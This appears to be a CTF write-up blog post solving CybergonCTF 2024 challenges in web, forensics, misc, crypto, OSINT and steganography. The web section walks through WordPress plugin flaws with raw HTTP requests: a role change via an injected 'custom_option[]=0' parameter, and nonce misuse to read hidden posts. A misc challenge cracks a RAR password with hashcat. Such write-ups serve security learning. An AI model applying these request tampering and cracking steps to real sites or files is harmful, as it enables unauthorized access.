CTF WriteUps

CybergonCTF 2024

date
Dec 1, 2024
slug
CybergonCTF 2024
author
status
Public
tags
WEB
Digital Forensics
forensics
misc
CRYPTO
OSINT
Reconnaissance
FTK Imager
Autopsy
Registry Explorer
steg
mp4 steg
wav
wav steg
audio steg
Tenant ID
Tenant Name
DNS TXT Records
DNS SPF Records
steghide
corrupted image
magic bytes
summary
Some writeups of CybergonCTF2024 Challenges
type
Post
thumbnail
category
CTF WriteUps
updatedAt
Dec 23, 2024 11:44 AM

Table of Contents:

 

Web:

Cybergon Blog:

notion image
  • Its a wordpress site, we are able to register a new user
notion image
  • Registering as a new user and logging in
  • They provided a file user-profile-enhancer.php Analyzing the code
<?php /* Plugin Name: User Profile Enhancer Description: Adds various customization options to the user profile update functionality. Version: 1.0 Author: mgthura */ function log_user_activity($user_id) { error_log("User ID {$user_id} updated their profile."); } function add_custom_profile_field($user) { echo '<h3>Custom Profile Settings</h3>'; echo '<table class="form-table"><tr>'; echo '<th><label for="custom_field">Custom Field</label></th>'; echo '<td><input type="text" name="custom_field" id="custom_field" value="" class="regular-text"></td>'; echo '</tr></table>'; } add_action('show_user_profile', 'add_custom_profile_field'); add_action('edit_user_profile', 'add_custom_profile_field'); function process_custom_profile_field($user_id) { if (isset($_POST['custom_field'])) { update_user_meta($user_id, 'custom_field', sanitize_text_field($_POST['custom_field'])); } } add_action('personal_options_update', 'process_custom_profile_field'); add_action('edit_user_profile_update', 'process_custom_profile_field'); function custom_admin_notice() { echo '<div class="notice notice-info"><p>Profile customization plugin is active!</p></div>'; } add_action('admin_notices', 'custom_admin_notice'); function add_custom_capability_to_admin() { $admin = get_role('administrator'); if ($admin && !$admin->has_cap('customize_theme')) { $admin->add_cap('customize_theme'); } } add_action('admin_init', 'add_custom_capability_to_admin'); function update_dummy_option() { update_option('dummy_option', time()); } add_action('admin_init', 'update_dummy_option'); function dummy_shortcode_function($atts) { return '<p>Dummy shortcode output!</p>'; } add_shortcode('dummy_shortcode', 'dummy_shortcode_function'); function display_user_role_in_footer() { if (is_admin() && current_user_can('read')) { $current_user = wp_get_current_user(); echo '<p style="text-align:center;">Your Role: ' . esc_html(implode(', ', $current_user->roles)) . '</p>'; } } add_action('admin_footer', 'display_user_role_in_footer'); function custom_profile_update_hook($user_id) { if (isset($_POST['custom_option']) && is_array($_POST['custom_option']) && in_array('0', $_POST['custom_option'])) { $user = get_user_by('id', $user_id); $user->set_role('contributor'); } } add_action('personal_options_update', 'custom_profile_update_hook'); add_action('edit_user_profile_update', 'custom_profile_update_hook'); function update_user_last_login($user_login, $user) { update_user_meta($user->ID, 'last_login', current_time('mysql')); } add_action('wp_login', 'update_user_last_login', 10, 2); function debug_user_data() { if (isset($_GET['debug_user'])) { $user = wp_get_current_user(); error_log(print_r($user, true)); } } add_action('admin_init', 'debug_user_data');
  • The add_custom_capability_to_admin function, adds a customize_theme when the role is administrator
function add_custom_capability_to_admin() { $admin = get_role('administrator'); if ($admin && !$admin->has_cap('customize_theme')) { $admin->add_cap('customize_theme'); } }
  • The below code, handles the update profile of user
function custom_profile_update_hook($user_id) { if (isset($_POST['custom_option']) && is_array($_POST['custom_option']) && in_array('0', $_POST['custom_option'])) { $user = get_user_by('id', $user_id); $user->set_role('contributor'); } }
  • Tryiing to update the custom field from the profile
notion image
  • Seeing the request in burp
POST /wp-admin/profile.php HTTP/1.1 Host: 46.250.232.141:8081 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://46.250.232.141:8081/wp-admin/profile.php Content-Type: application/x-www-form-urlencoded Content-Length: 332 Origin: http://46.250.232.141:8081 DNT: 1 Connection: keep-alive Cookie: wordpress_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C95a67175782654747e162b9a668f9db5cdb75f16466721e7d3c99ab0f7e54fb6; wordpress_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734286002%7CZ26P2AZH3xl5ETC8QbIUN7AGpxLPVSOBRqrjbK7CHkh%7Ca2648879fd1a9897c1c50011ba539e88af2f8d899a7e157cdd1c68e2327de08f; wp-settings-time-6=1732974878; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1733071608; wordpress_logged_in_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C49d8df2366f64722241583bc182606783c3340d9cff0837643f2c109af46fa2f; wp_lang=en_US; wp-settings-time-2=1733076405; wordpress_logged_in_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734286002%7CZ26P2AZH3xl5ETC8QbIUN7AGpxLPVSOBRqrjbK7CHkh%7C5cfa3c473aff3e0a8444f4931055a0667567c164c9415e56ba6c0a0af8e0d422 Upgrade-Insecure-Requests: 1 Priority: u=0, i _wpnonce=c53780692f&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=4d14849248&admin_color=fresh&admin_bar_front=1&user_login=test&first_name=&last_name=&nickname=test&display_name=test&email=&url=&description=&pass1=&pass2=&custom_field=administrator&action=update&user_id=2&submit=Update+Profile
  • This doesn’t have custom_option argument as per the check,,..
function custom_profile_update_hook($user_id) { if (isset($_POST['custom_option']) && is_array($_POST['custom_option']) && in_array('0', $_POST['custom_option'])) { $user = get_user_by('id', $user_id); $user->set_role('contributor'); } }
  • We need to add custom_option argument array with value with 0
custom_field=administrator&custom_option[]=0
  • After sending the request going back to the home page we got the flag
http://46.250.232.141:8081/
notion image
  • The flag is
CYBERGON_CTF2024{w0rdpr3ss_vUlN_1s_FuN_4nd_3asy}

Cybergon Blog 2:

notion image
  • The application is very similar to Cybergon Blog1
  • Review the new file that they provided user-post-enhancer.php
<?php /* Plugin Name: User Post Enhancer Description: A plugin to enhance user posts with additional functionality. Version: 1.0 Author: mgthura */ if (!defined('ABSPATH')) { exit; // Exit if accessed directly } class CustomUserActions { public function __construct() { add_action('init', [$this, 'register_ajax_actions']); add_action('wp_enqueue_scripts', [$this, 'enqueue_scripts']); add_action('wp_ajax_generate_nonce', [$this, 'generate_nonce']); add_action('wp_ajax_nopriv_generate_nonce', [$this, 'generate_nonce']); add_action('wp_ajax_read_post_data', [$this, 'read_post_data']); add_action('wp_ajax_read_post', [$this, 'read_post']); add_action('wp_ajax_update_user_preferences', [$this, 'update_user_preferences']); add_action('wp_ajax_fetch_user_settings', [$this, 'fetch_user_settings']); add_action('wp_ajax_get_recent_posts', [$this, 'get_recent_posts']); add_action('wp_ajax_submit_feedback', [$this, 'submit_feedback']); add_action('wp_ajax_update_avatar', [$this, 'update_avatar']); add_action('wp_ajax_fetch_api_data', [$this, 'fetch_api_data']); add_action('wp_ajax_review_security_policies', [$this, 'review_security_policies']); add_action('wp_ajax_sync_server', [$this, 'sync_server']); add_action('wp_ajax_process_shortcode', [$this, 'process_shortcode']); add_action('wp_ajax_execute_background_task', [$this, 'execute_background_task']); } public function generate_nonce() { if (is_admin()) { $nonce = wp_create_nonce('read_post_data_nonce'); wp_send_json_success(['nonce' => $nonce]); } else { wp_send_json_error(['message' => 'Unauthorized']); } } public function read_post() { $post_id = isset($_POST['post_id']) ? intval($_POST['post_id']) : 0; $post = get_post($post_id); if ($post && $post->post_status === 'publish') { wp_send_json_success(['post_data' => [ 'title' => $post->post_title, 'content' => $post->post_content, ]]); } else { wp_send_json_error(['message' => 'Post not found or not published']); } } public function read_post_data() { check_ajax_referer('read_post_data_nonce', 'nonce'); $post_id = isset($_POST['post_id']) ? intval($_POST['post_id']) : 0; $post = get_post($post_id); if (is_admin() && $post) { wp_send_json_success(['post_data' => [ 'title' => $post->post_title, 'content' => $post->post_content, ]]); } else { wp_send_json_error(['message' => 'Unauthorized or post not found']); } } public function update_user_preferences() { $user_id = get_current_user_id(); $prefs = ['theme' => 'light', 'notifications' => 'enabled', 'language' => 'en']; $updated = update_user_meta($user_id, 'preferences', $prefs); if ($updated) { wp_send_json_success(['message' => 'Preferences updated.', 'preferences' => $prefs]); } else { wp_send_json_error(['message' => 'Failed to update preferences.']); } } public function fetch_user_settings() { $user_id = get_current_user_id(); $settings = [ 'email' => wp_get_current_user()->user_email, 'timezone' => get_option('timezone_string', 'UTC'), ]; if (!empty($settings)) { wp_send_json_success(['message' => 'Settings fetched successfully.', 'settings' => $settings]); } else { wp_send_json_error(['message' => 'Failed to fetch settings.']); } } public function get_recent_posts() { $posts = get_posts(['numberposts' => 5, 'post_status' => 'publish']); $data = array_map(function ($post) { return ['title' => $post->post_title, 'id' => $post->ID]; }, $posts); if ($data) { wp_send_json_success(['message' => 'Recent posts retrieved.', 'posts' => $data]); } else { wp_send_json_error(['message' => 'No posts available.']); } } public function submit_feedback() { $feedback = isset($_POST['feedback']) ? sanitize_text_field($_POST['feedback']) : ''; $feedback_id = wp_insert_post([ 'post_title' => 'User Feedback', 'post_content' => $feedback, 'post_status' => 'pending', 'post_type' => 'feedback', ]); if ($feedback_id) { wp_send_json_success(['message' => 'Feedback submitted successfully.', 'id' => $feedback_id]); } else { wp_send_json_error(['message' => 'Failed to submit feedback.']); } } public function update_avatar() { $avatar_id = isset($_POST['avatar_id']) ? intval($_POST['avatar_id']) : 0; $user_id = get_current_user_id(); if ($avatar_id && $user_id) { update_user_meta($user_id, 'avatar', $avatar_id); wp_send_json_success(['message' => 'Avatar updated.', 'avatar_id' => $avatar_id]); } else { wp_send_json_error(['message' => 'Invalid avatar or user.']); } } public function fetch_api_data() { $api_url = 'https://catfact.ninja/fact'; $response = wp_remote_get($api_url); $body = wp_remote_retrieve_body($response); if ($body) { wp_send_json_success(['message' => 'Data fetched from API.', 'data' => json_decode($body)]); } else { wp_send_json_error(['message' => 'Failed to fetch data from API.']); } } public function review_security_policies() { wp_send_json_success(['message' => 'Security policies reviewed.']); } public function sync_server() { wp_send_json_success(['message' => 'Server synchronization complete.']); } public function process_shortcode() { wp_send_json_success(['message' => 'Shortcode processed.', 'shortcode' => '[example_shortcode]']); } public function execute_background_task() { wp_send_json_success(['message' => 'Background task completed.']); } } new CustomUserActions();
  • This function is used to read posts using id
public function read_post_data() { check_ajax_referer('read_post_data_nonce', 'nonce'); $post_id = isset($_POST['post_id']) ? intval($_POST['post_id']) : 0; $post = get_post($post_id); if (is_admin() && $post) { wp_send_json_success(['post_data' => [ 'title' => $post->post_title, 'content' => $post->post_content, ]]); } else { wp_send_json_error(['message' => 'Unauthorized or post not found']); } }
  • Note that it gets the nonce and checks it so we need to generate the nonce
  • If we check the code, there is a function to generate nonce
public function generate_nonce() { if (is_admin()) { $nonce = wp_create_nonce('read_post_data_nonce'); wp_send_json_success(['nonce' => $nonce]); } else { wp_send_json_error(['message' => 'Unauthorized']); } }
  • First register and login as a user and login as the user
  • Now we have to generate nonce using the action generate_nonce
http://46.250.232.141:8082/wp-admin/admin-ajax.php?action=generate_nonce
notion image
  • Using the generated nonce now we can access any post using the action read_post_data
POST /wp-admin/admin-ajax.php?action=read_post_data HTTP/1.1 Host: 46.250.232.141:8082 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: keep-alive Cookie: wordpress_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734280291%7CtMiiCL9dcuPcej4M8L8hcroZaUhYSGXF27sY5JpWYdP%7Cd6ba930c8d686559be7b8a6af8db427ead1c200596db02d69489ad05855cc080; wordpress_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C95a67175782654747e162b9a668f9db5cdb75f16466721e7d3c99ab0f7e54fb6; wp-settings-time-6=1732974878; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1733071608; wordpress_logged_in_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734280291%7CtMiiCL9dcuPcej4M8L8hcroZaUhYSGXF27sY5JpWYdP%7C0b77f681720f52823e284e72140abd18bbc85eaa84de7fd7b005439db5d956c9; wp-settings-time-2=1733070777; wordpress_logged_in_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C49d8df2366f64722241583bc182606783c3340d9cff0837643f2c109af46fa2f Upgrade-Insecure-Requests: 1 Priority: u=0, i Content-Type: application/x-www-form-urlencoded Content-Length: 26 nonce=34126cec0f&post_id=5
notion image
  • The flag is
CYBERGON_CTF2024{W0rdPr3ss_1s_FuN_W4s_1t?}
 

Digital Forensics:

  • I got 15 segments of .E01 .E02 .. files.. So I used FTK Imager to merge the files
  • You can watch this video just incase β†’ click here

Warmup:

notion image
  • Extracting hives from the below location using autopsy
C:\Windows\System32\config\
  • Then using Registry Explorer to view the Registry View
  • Researching and found that we can get the Timezone from the below registry
SYSTEM\ControlSet001\Control\TimeZoneInformation
notion image
  • We got the time zone as Singapore Standard Time and the bias -480 Indicates the timezone offset in minutes from UTC
CYBERGON_CTF2024{UTC+08:00 Singapore Standard Time}
  • But for some reason, I was not getting the right flag, checking my timezone setting I found the right fortmat
notion image
CYBERGON_CTF2024{UTC+08:00 Kuala Lumpur, Singapore}

Welcome - 1:

notion image
  • Opening the Solid whole image in autopsy and running all the modules
  • Just clicking the data source, under Data Artifacts We got the Device Name and Device Owner's Name
notion image
  • The final flag is
CYBERGON_CTF2024{White-Party, SEAN JOHN COMBS}

Welcome - 2:

notion image
  • In autopsy I was checking on the Web Cookies and found c_user value.. It is a userID
    • notion image
  • Now we need to find Bio status
  • We can view the facebook profile with c_user
https://www.facebook.com/profile.php?id=61567849079733
notion image
  • We got the bio as East Coast Rapper
  • The final flag is
CYBERGON_CTF2024{61567849079733, East Coast Rapper}

Welcome - 3:

notion image
  • When browsing around the autopsy and clicking around different files. I found the details of OS Account
notion image
  • The final flag is
CYBERGON_CTF2024{Ko Toke Gyi}

Sleep Timeout:

notion image
  • After lot of researching and study, I found the registry where it saves the Sleep Power Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20
  • Using Registry Explorer to browse the hive, System standby timeout
notion image
  • We need to find the Active Setting
  • To find the ActivePowerScheme We need to check the below registry
SYSTEM\ControlSet001\Control\Power\User\PowerSchemes
notion image
  • We can see the active power scheme which is Balanced (recommended)
notion image
  • Now we can get the values DCSettingIndex and ACSettingIndex
  • The DCSettingIndex is when battery is used and ACSettingIndex is when plugged in
notion image
  • Now we need to convert this to seconds
  • The final flag is
CYBERGON_CTF2024{300, 60}
 

Misc:

Triple Quiz:

notion image
  • Its a rar file and it asked for a password so we need to crack it first
  • Converting the rar to hash
rar2john Triple_Quiz.rar > hash
  • Using hashcat with wordlist rockyou.txt to crack it
hashcat hash rockyou.txt
  • We got the password as ICEMAN
notion image
  • Now, we get a .wav file, listing it, it looks like morse code
  • So we need to convert from morse audio using this online tool
notion image
  • We got these values
6 666 777 7777 33 9 444 8 44 8 66 444 66 33
  • Using that to decode, we got the flag
notion image
  • The final flag is
CYBERGON_CTF2024{MORSEWITHTNINE}

Your Favorite Song:

notion image
  • We got a mp4 file
  • Opening and playing it, its APT APT song by bruno mars and rose
  • So according to the description, the password is
apartment
  • Trying to extract using binwalk
binwalk -e song.mp4
  • Moving into the directory we are able to find zip file
  • Now extracting it with the password apartment
  • We got metadata.txt which had the flag
notion image
  • The flag is
CYBERGON_CTF2024{Y0u_g07_r053}

Rules:

notion image
  • The first part of the flag we got from the discord rules channel
notion image
  • Decoding that we get
Flag Part1 > d1sc0rd_
notion image
  • The second part of the flag we got from the rules page from the website
notion image
Flag Part2 > p0rt4l
notion image
  • The final flag is
CYBERGON_CTF2024{d1sc0rd_p0rt4l_w3b}

Zip Zap:

notion image
  • It is zipped 500 times
  • Each time the password will be in the filename inside the zip file
notion image
  • In this case the ' is the password, It will go on
  • Since the password changes each time, we anyways need to script it
import os import subprocess import re import sys # Initial ZIP file to start with current_zip = "487. This is the password - b.zip" while os.path.isfile(current_zip): print(f"Processing: {current_zip}") try: # List the contents of the current ZIP file result = subprocess.run(["7z", "l", current_zip], capture_output=True, text=True) if result.returncode != 0: print(f"Error: Failed to list contents of {current_zip}. Exiting.") sys.exit(1) # Extract all the inner file names from the 7z output inner_files = re.findall(r"(\d+\. This is the password - .+\.zip)", result.stdout) if not inner_files: print(f"Error: Could not find any inner files in {current_zip}. Exiting.") sys.exit(1) # Select the last inner file (which should be the next ZIP file) inner_file = inner_files[-1] # Take the last match print(f"Inner file: {inner_file}") # Extract the password from the inner file name password_match = re.search(r"(?<=This is the password - )(.*?)\.zip", inner_file) if not password_match: print(f"Error: Could not extract the password from {inner_file}. Exiting.") sys.exit(1) password = password_match.group(1) # Extract the matched password print(f"Password: {password}") # Extract the current ZIP file using the password print(f"Extracting {current_zip} with password: {password}") result = subprocess.run(["7z", "x", current_zip, f"-p{password}"], capture_output=True, text=True) if result.returncode != 0: print(f"Error: Extraction failed for {current_zip} with password: {password}. Exiting.") print(result.stderr) sys.exit(1) # Update the current ZIP file for the next iteration current_zip = inner_file print(f"Next file to process: {current_zip}") except Exception as e: print(f"An unexpected error occurred: {e}") sys.exit(1) print("All ZIP files have been successfully processed!")
  • At last we got the flag!
notion image
  • Yo, but WTF!
  • Asking the support they say to analyze better
  • Then I found out that the some of the password characters are the password
notion image
ls | awk -F '- ' '{print $2}' | sed 's/.zip$//' | tr -d '\n'
  • We used the above command to get the flag
notion image
CYBERGON_CTF2024{y0U_g07_r341_F14g}
 

Crypto:

Warm Up:

notion image
  • We got 1 and 0 s
    • notion image
notion image
  • Then use the From_Binary('Space') and From_Hex('Space') and putting in cipher-identifier and trying one by one each result
    • notion image
  • We got the flag when we used Base 92 encoding
CYBERGON_CTF2024{b45392_h3x_b1n4ry}
notion image

Warm Up 1:

notion image
  • Here, the first part is brain fuck and the second part is whitespace
notion image

Flag (Part 1):

notion image
  • Trying to decode using brainfuck we got the first part of the flag
br41nfuck_0r_
notion image

Flag (Part 2):

notion image
  • Trying to decode using whitespace we got the second part of the flag
wh1t35p4c3?
notion image
  • The final flag is
CYBERGON_CTF2024{br41nfuck_0r_wh1t35p4c3?}

I Love Poetry:

notion image
  • I am able to see the poem, with some encoded string at the end
notion image
  • Using cyberchef to decode the encoding, its actually base64 and we get this
11:1 14:7 1:3 1:4 7:5 14:2 3:3
notion image
  • After further analzying, its the line and the word from the poem
  • I got the final flag
CYBERGON_CTF2024{Haveyoueverheardthepoemcipher}

Chill Bro:

notion image
  • We got this image
notion image
  • We got the flag
notion image
CYBERGON_CTF2024{TAKEABREAKBROLETSDANCE}

E45y p345y:

notion image
  • Identified its Rail Fence Cipher
  • Using Cyberchef to decode it, trying different key and adjusting the offset we got the flag
notion image
CYBERGON_CTF2024{R4!1_f3Nc3_C!pH3r_KrUb}
 

OSINT:

Vacation:

notion image
  • They have provided with an image
  • Google reverse image searching it
notion image
  • One of the image looks similar, so searching the place
muong thanh bai chay hotel
  • But the flag was not correct, but I was pretty sure the place was
Ha Long, Vietnam
  • Through further osint I found this
  • The final flag is
CYBERGON_CTF2024{Muong Thanh Luxury Ha Long Centre Hotel, Ha Long, Vietnam}

Favorite Journal:

notion image
  • We got this image
notion image
  • After some reverse image searching I found name of the journal.. Shwe Thway
  • The publised date is 4-1-1969
  • printing house is Sarpay Beikman
  • got the first edition, from this and this checking the last page
notion image
  • translated it from burmese to english
notion image
  • Found it from the last page
CYBERGON_CTF2024{4-1-69_0032}

The Stadium:

notion image
  • We got this image
notion image
  • Reverse image searching we found its centre bell
  • But the other details were wrong, we know its centre bell from canada
  • Searching in google hockey stadium in canada we got this wiki
  • Which gave all the info
notion image
  • The final flag is
CYBERGON_CTF2024{Montreal_Quebec_21700_1996}

The Pagoda:

notion image
  • Reverse image searching
notion image
  • locate the ananda temple donation center's position
notion image
  • Use dcode to get the what3words approx location..
notion image
notion image
  • Take the top left corner of the donation centre
notion image
  • Then to find the Buddhas we used this wiki
notion image
  • We got the flag
CYBERGON_CTF2024{doorstops.overthrows.folder_4_Gautama_Kakusandha_Kassapa_Konagamana}

The Train & The Bridge:

notion image
  • We got this image
notion image
  • Reverse image searching we got this
notion image
  • We found the built year which is 1969
  • Then we got a video
notion image
  • Reverse searching we found its Goteik Viaduct
notion image
  • After further osint we found the video on youtube
  • Bridge video published: 9 May 2019
  • The final flag is
CYBERGON_CTF2024{1969_gokteik_09-05-2019}

History Repeats Itself:

notion image
  • We got this image
notion image
  • Reverse image searching we found this resource
  • This disclosed the year when it happened
  • Finally we got the flag
CYBERGON_CTF2024{February_12_1947}

The Statue:

notion image
  • They have provided with the image
  • Reverse image searching we got this
notion image
  • Searching in the map, we got the coordinates
notion image
  • The final flag is
CYBERGON_CTF2024{22.0804, 95.2893}
 

Reconnaissance:

Validation:

notion image
notion image
  • Note, TXT records might also contain SPF records, we also need to include it
notion image

Uncover:

notion image
notion image
  • This gave us the tenant name
notion image
CYBERGON_CTF2024{goddamnit2024.onmicrosoft.com}

Secure Life:

notion image
  • We have given a certficate.der file
  • We see the information about the certificate using openssl
openssl x509 -in certificate.der -text
notion image
  • Therefore the flag is
CYBERGON_CTF2024{2039:11:24:20:38:00}
 

STEGANO:

Invisible:

notion image
notion image
  • We got some common passwords
null winteriscoming getyourflag winteriscominggetyourflag
  • Using steghide and trying to extract files using the gained passwords
steghide extract -sf challenge1.jpg -p getyourflag
notion image
  • We got the flag
CYBERGON_CTF2024{n07h1ng_5t4ys_h1dd3n}

Truesight:

notion image
  • The image could not be opened, might be corruped, opening it in hexedit
  • The magic bytes are missing, so inserting 8 bytes to add the magic bytes
notion image
  • Adding the magic bytes accordingly for png
89 50 4E 47 0D 0A 1A 0A
notion image
  • Then downloading the file we got the flag
notion image
  • The flag is
CYBERGON_CTF2024{y0u_g07_7h3_r!gh7_s1gn5}